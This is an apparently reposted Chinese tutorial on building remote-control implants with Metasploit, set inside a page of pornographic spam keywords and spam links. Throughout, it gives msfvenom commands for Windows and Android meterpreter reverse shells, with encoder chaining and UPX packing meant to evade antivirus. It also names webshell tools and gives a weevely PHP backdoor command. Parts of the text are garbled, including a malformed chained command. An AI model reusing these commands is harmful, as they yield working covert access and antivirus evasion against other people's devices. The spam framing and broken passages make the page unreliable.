天天操夜夜爱_天天插天天操天天干_黄色av地址_成人黄色在线观看_国内久久久久久_欧美国产日韩一区二区三区_国产精品久久久久久久久晋中

win10電腦遠程控制

發布時間: 2023-04-15 21:49 閱讀: 文章來源:轉載

1生成被控端2、啟動主控端3、

Netcat 瑞士軍刀

掃描端口

建立連接

掃描某IP地址的指定端口

nc -v ip port

連接指定IP地址的指定端口的命令如下

nc ip port

以靶機Metasploitable 2的80端口為例測試

控制軟件如果是正向的,受害者計算機執行遠程控制被控端之后,會在自己主機上打開一個端口,等待hacker連接,受害者計算機不會主動通知計算機,因此hacker必須知道計算機A的IP地址

控制軟件如果是反向的,受害者計算機執行遠程控制被控端之后,會主動通知hacker,因此黑客無須知道受害者計算機的IP地址,目前主要使用的方式

1、如何使用MSFPC生成被控端 linux

各種類型的被控端

生成linux的被控端,IP選擇本機的etho網卡

運行run,很快就建好了一個handler,這就是對應被控終端的主控端

2、如何在kali linux2 中生成被控端

msfpc 是MSFvenom的優化版

┌──(rootkali)-[~]

└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 354 bytes

Final size of exe file: 73802 bytes

Saved as: /var/payload.exe

這里我們使用msfvenom命令生成一個被控端,使用的被控端就是一個用于windows操作系統的反向遠程控制軟件,即windows/meterpreter/reverse_tcp lhost=192.168.8.128是所使用的的kalilinux的虛擬機IP地址

使用以下命令可以查看所有可以使用的攻擊載荷

name攻擊載荷的名稱 操作系統+控制方式+模塊

查找Metasploit 可以在Android操作系統下運行的meterpreter

查看攻擊載荷需要設置的參數

msfvenom --list-options -p windows/meterpreter/reverse_tcp

2、如何在kali linux2中啟動主控端

輸入msfconsole啟動metasploit

在metasploit中使用handler作為主控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /root/payload.exe

3、遠程控制被控端與殺毒軟件的博弈

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe

消除payload.exe的特征碼,msf編碼器可以將原可執行程傳重新編碼,生成一個新的二進制文件,這個文件執行后,msf編碼器會將原可執行程序解碼到內存中并執行

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/nonalpha -f c

-e 選擇的編碼器,使用 x86/nonalpha編寫方式的到的shellcode如圖所示

x86/shikata_ga_nai 兩次生成的shellcode雖然功能相同,但是代碼已經不同了,這也是黑客鐘愛的編碼方式,可以進行多次編碼 -i 編碼次數

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f -raw | msfvenom -e x86/alpha_upper -a x86/countdown -a x86 --platform windows -i 10 -f exe -o /var/payload.exe

3.1 加殼也是對抗基于文件掃描和內存掃描的反病毒技術

加殼工具UPX

upx /var/payload.exe

3.2 powersploit免殺

4、Meterpreter在Android中的應用

4.1查找在Android運行的攻擊載荷

下面以 android/meterpreter/reverse_tcp 為例

msfvenom --list-options -p android/meterpreter/reverse_tcp

執行完畢后可以看到被控端的參數

測試環境

1、Android手機IP地址 192.168.1.101

2、kalilinux 安裝到虛擬機改用橋接模式 192.168.1.34

3、無線路由192.168.1.1

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=9999 R>/var/pentest.apk

這條命令執行完畢后就在var目錄生成了一個pentest.apk的文件

4、建立主控端

啟動Metasploit

msfconsole

5、對web實現遠程控制

中國菜刀 中國蟻劍 冰蝎 weevely(生成PHP木馬)

weevely generate 123456 /home/kali/Downloads/testweb.php

password 是生成木馬的密碼 path是路徑 filename 文件名

把后門傳到靶機里

???展開全文
相關文章
主站蜘蛛池模板: 狠狠色噜噜狠狠狠四色米奇 | 亚洲精品在线观看视频 | 欧美在线免费 | 欧美日韩在线视频播放 | 天天干天天澡 | 不卡高清av手机在线观看 | 久久v | 免费香蕉成视频成人网 | 国产人妖在线视频 | 国产人伦激情在线观看 | 国产剧情在线观看 | 99视频精品全部免费观看 | 日本高清一二三区 | 久久精品国产免费观看99 | jizz中国zz女人18 | 99re免费99re在线视频手机版 | 2018天天干夜夜操 | 轻轻草在线视频 | 欧美日韩国产在线 | 欧美性最猛xxxx在线观看视频 | 久久精品无码一区二区三区 | 久久这里只有精品视频99 | 国产精品大全国产精品 | 全部免费特黄特色大片视频 | 激情小说亚洲色图 | 性夜影院爽黄a爽免费视频 性做久久久久久坡多野结衣 | 精品午夜寂寞影院在线观看 | 亚洲伦理中文字幕 | 久久久久久久97 | 欧美日韩在线免费 | 久久精品国产亚洲 | 亚洲视频在线一区 | 国产亚洲美女精品久久久 | 欧美日韩在大午夜爽爽影院 | 国产欧美在线视频免费 | 在线欧美69v免费观看视频 | 国产老肥熟一区二区三区 | 国产页 | 久久精品一区二区三区不卡 | 午夜资源网| 久久综合视频网站 |